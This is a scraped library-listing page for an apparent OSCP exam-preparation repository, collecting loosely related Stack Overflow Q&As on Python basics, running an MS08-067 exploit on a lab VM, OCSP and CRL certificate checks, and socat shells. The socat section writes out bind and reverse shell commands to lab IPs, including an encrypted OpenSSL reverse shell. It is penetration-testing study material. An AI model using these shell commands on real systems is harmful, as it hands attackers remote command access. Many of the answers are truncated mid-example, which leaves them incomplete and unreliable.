OSCP | Collection of things made during my OSCP journey | Hacking library
kandi X-RAY | OSCP Summary
kandi X-RAY | OSCP Summary
Hello world! This repo contain some of the scripts, exploits, and documents made during my OSCP journey. The list include but not limited to the following:.
Support
Quality
Security
License
Reuse
Top functions reviewed by kandi - BETA
Currently covering the most popular Java, JavaScript and Python libraries. See a Sample of OSCP
OSCP Key Features
OSCP Examples and Code Snippets
Community Discussions
Trending Discussions on OSCP
QUESTION
My buddy sent me a screenshot a question he was stuck on for an assessment and asked if I was able to help. So I took a shot at it and it's been two days now and this is haunting my dreams.
Question: "create a function named first_word that takes in a string and returns the first word.
Given Code:
...ANSWER
Answered 2022-Mar-12 at 01:19You have the right basic idea here:
QUESTION
Context: Running an exploit vs a vulnerable VM as a part of my OSCP studies. I know this VM is vulnerable to this exploit because I ran the exploit inside MSF(pentesting framework) and it worked, but doing it manually I am having dependency issues.
Setup: I am on kali, latest quarterly release
Exploit: https://github.com/andyacer/ms08_067
Trying to install dependencies
Keep in mind on kali "python" points to python2.7.18, and python3 points to python3.xwhatever because of backwards compatibility (funny huh) because tons of exploits are written in python2
the script uses #!/usr/bin/env python thus points to python2.7.18
I have already tried various solutions from various SO threads as well as articles on google.
...ANSWER
Answered 2021-Oct-18 at 05:12Can you please check under /usr/local/lib that you have some version of python2 installed?
You should also be able to run python2 -V to verify that you do have python2 installed.
To install pip for python2, download get-pip.py from here and then run this command:
QUESTION
The first image is from a pdf signature which is LTV enabled. This document is not created by me.
In the revocation information, it shows the following text:
The selected certificate is considered valid because it has not been revoked as verified using the Online Certificate Status Protocol (OCSP) response that was embedded in the signature.
I do sign a pdf document using iText and I also apply an OCSP.
...ANSWER
Answered 2021-Apr-28 at 15:57You add one OCSP response, the one you retrieve here:
QUESTION
How do I make a simple request for certificate revocation status to an EJBCA OSCP Responder using the Python requests library?
Example:
...ANSWER
Answered 2020-Nov-01 at 13:49Basically it involves the following steps:
- retrieve the corresponding cert for a hostname
- if a corresponding entry is contained in the certificate, you can query the extensions via AuthorityInformationAccessOID.CA_ISSUERS, which will provide you with a link to the issuer certificate if successful
- retrieve the issuer cert with this link
- similarly you get via AuthorityInformationAccessOID.OCSP the corresponding OCSP server
- with this information about the current cert, the issuer_cert and the ocsp server you can feed OCSPRequestBuilder to create an OCSP request
- use
requests.getto get the OCSP response - from the OCSP response retrieve the
certificate_status
To retrieve a cert for a hostname and port, you can use this fine answer: https://stackoverflow.com/a/49132495. The OCSP handling in Python is documented here: https://cryptography.io/en/latest/x509/ocsp/.
Code
If you convert the above points into a self-contained example, it looks something like this:
QUESTION
I have a certificate that does not have an OSCP responder URL and it has 3 CRL endpoints configured. The first url only works from within my corporate network, the second and third can be accessed from outside.
The issue is when I do a chain.Build() on my certificate on a .net core 3.1 service, running on an Alpine base image in AKS cluster, it returns false with the chain element's status as "Unable to get certificate CRL". Since, my pods are not on corpNet anyway, I would expect the chain.Build() to somehow do a round-robin on the endpoints but I am not sure how it actually works.
Is there a way we can hit the other endpoints and get the CRLS?
...ANSWER
Answered 2020-Sep-02 at 19:31No, the Linux implementation of X509Chain only tries the first HTTP endpoint for a CRL distribution point.
QUESTION
I am digitally signing a PDF with iText7 and GlobalSign DSS. I implemented the GlobalSing DSS API calls into the necessary iText classes. I get the proper server responses and I am able to call the pdfSigner.signDetached() method with all the needed arguments. Signing with the pdfSigner also succeeds and I get a signed PDF that looks good at first sight. But when I open the signed pdf in Adobe Reader it tells me that the trust chain of the signing certificate is broken and that it can not trace it back to the CA root. Which is strange because it is an AATL certificate and the AATL list of the Adobe Reader is up to date.
And I do not understand why this is happening.
This is what I do :
call DSS for an identity : returns an id string, the signing certificate and an ocsp response
call DSS for the trustchain : returns the chain of certificates used to
sign the signing certicate, up to the GlobalSign root, together with
their oscp responses (except for the root)I create an array of X509Certificate objects containing the signing
certificate, 2 intermediates and the GlobalSign root certificate (in that order)I implement an IOcspClient that uses the ocsp response from the DSS call for the identity
I implement an ITsaClient that calls the DSS API /timestamp/{digest}
and finally I execute : pdfSigner.signDetached(externalDigest, externalSignature, chain.toArray(new X509Certificate[]{}), null, dssOcspClient, dssTSAClient, 0, PdfSigner.CryptoStandard.CMS);
in which the externalSignature (an implementation of IExternalSignature) will call the DSS identity/{id}/sign/{digest} API
While debugging into the signDetached method and deeper into the pdfSigner code, I clearly see that all certificates are in the chain in the right order. I see them being processed in the PdfPKCS7 class (however I don't know/understand exactly what is going on there). I see the signing taking place, no exceptions are thrown and at the end the produced PDF looks like it is correctly signed. Which Adobe says is not.
What am I missing here ?
The trustchain response from de DSS API not only returns the certificates from the chain of trust of the signing certificate, but also the ocsp responses for the two intermediates between the signing certificate and the GlobalSign root. These are never used. And in fact I don't know what to do with them either.
Could these be the missing pieces for AdobeReader to reconstruct the trust chain up to the GlobalSign root ?
And if so : how do I put them into that PDF ?
And if not : then what am I doing wrong that breaks that trustchain ?
An answer to these questions would save my day :-)
Here is the link to a PDF that will show the problem :
test pdf signed with DSS
(after accepting the answer, I removed the example pdf on my client's request)
Below are some pieces of the code.
The center piece that gathers the DSS info and calls the signDetached method
ANSWER
Answered 2020-Apr-08 at 14:14Your signer certificate is invalid.
In detailYour signer certificate and its certificate chain (according to issuer/subject match) are embedded in the signature, in particular your certificate with subject
cn=Homologatie Voertuigen, ou=Departement Mobiliteit en Openbare Werken, ou=Vlaams Huis voor de Verkeersveiligheid, o=Ministeries van de Vlaamse Gemeenschap, l=Brussel, st=Brussel, c=BE
and its claimed issuer
cn=GlobalSign CA 5 for AATL, o=GlobalSign nv-sa, c=BE
Thus, one can check the signature with which your certificate is signed. And while doing so one sees that the TBSCertificate part of your signer certificate (the to-be-signed part) has this digest value
QUESTION
I'm trying to learn about certificate and CRL handling, so I created the following example certificate chain:
Root CA (self-signed) → Intermediate CA (signed by Root CA) → Server Cert (signed bei Intermediate CA)
Now I would like to test certificate revocation to be effective. To do so, I revoke the Server Cert and create a CRL file (of the Intermediate CA) accordingly. The X509v3 CRL Distribution Points are present in all of the certificate files, and they are accessible via http, like:
...ANSWER
Answered 2020-Mar-20 at 18:16Indeed there were mainly two mistakes I had made:
- The CRL file mandatorily has to be in DER format, which I did not know. (Conversion from the PEM format is simple:
openssl crl -in ${crlFile}.pem -outform DER -out ${crlFile}). - Of course, a certicate's CRL distribution point has to be the one of its parent CA. (So, e. g. for my intermediate CA, it must be the one of the root CA.)
Keeping this in mind and also chaining the intermediate CA certs to the server certs, as dave_thompson_085s very helpful comments suggested, the original command
QUESTION
Hey guys I need your help here !
I recently upgraded my OSCP material to get the new OSCP version 2020 and I came across the chapter with socat to create encrypted bind shell/reverse shell.
I thought I understood how to use it, but my attempts to send an encrypted reverse shell from my windows machine to my Kali machine has been unsuccessfuls.
I decided to do some trials and error with an unencrypted bind shell on both sides.
Here is what worked for me :
- Kali Bind Shell (Getting /bin/bash on Windows by connecting to the kali binded shell socket)
- Kali Reverse Shell (Getting /bin/bash on Windows by sending it to the windows listening socket)
Here's what did not worked for me :
- Windows Bind Shell (Getting cmd.exe by connecting to the windows listening shell socket)
- Windows Reverse Shell (Getting cmd.exe by sending it to the Kali listening socket)
Here is what i did :
Kali Bind Shell - OK
Kali (192.168.119.145)
socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash
Windows 10 (192.168.145.10)
socat -d -d -d - TCP4:192.168.119.145:4444
Kali Reverse Shell - OK
Windows 10 (192.168.145.10)
socat -d -d -d TCP4-LISTEN:4444,fork STDOUT
Kali (192.168.119.145)
socat -d -d -d TCP4:192.168.145.10:4444 EXEC:/bin/bash
Windows Bind Shell - NOT OK
Windows 10 (192.168.145.10)
socat -d -d -d TCP4-LISTEN:4444,fork EXEC:cmd.exe
Kali (192.168.119.145)
socat -d -d -d - TCP4:192.168.145.10:4444
Windows Reverse Shell - NOT OK
Kali (192.168.119.145)
socat -d -d -d TCP4-LISTEN:4444,fork STDOUT
Windows 10 (192.168.145.10)
socat -d -d -d TCP4:192.168.119.145:4444 EXEC:cmd.exe
Here is what I get :
Windows bind shell - Windows Machine
...ANSWER
Answered 2020-Feb-19 at 13:38Windows machine (copy the .pem file from kali):
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0 STDOUT
Kali machine: socat OPENSSL:192.168.X.X:443,verify=0 EXEC:/bin/bash
Community Discussions, Code Snippets contain sources that include Stack Exchange Network
Vulnerabilities
Install OSCP
You can use OSCP like any standard Python library. You will need to make sure that you have a development environment consisting of a Python distribution including header files, a compiler, pip, and git installed. Make sure that your pip, setuptools, and wheel are up to date. When using pip it is generally recommended to install packages in a virtual environment to avoid changes to the system.
Support
Reuse Trending Solutions
Find, review, and download reusable Libraries, Code Snippets, Cloud APIs from over 650 million Knowledge Items
Find more librariesStay Updated
Subscribe to our newsletter for trending solutions and developer bootcamps
Share this Page
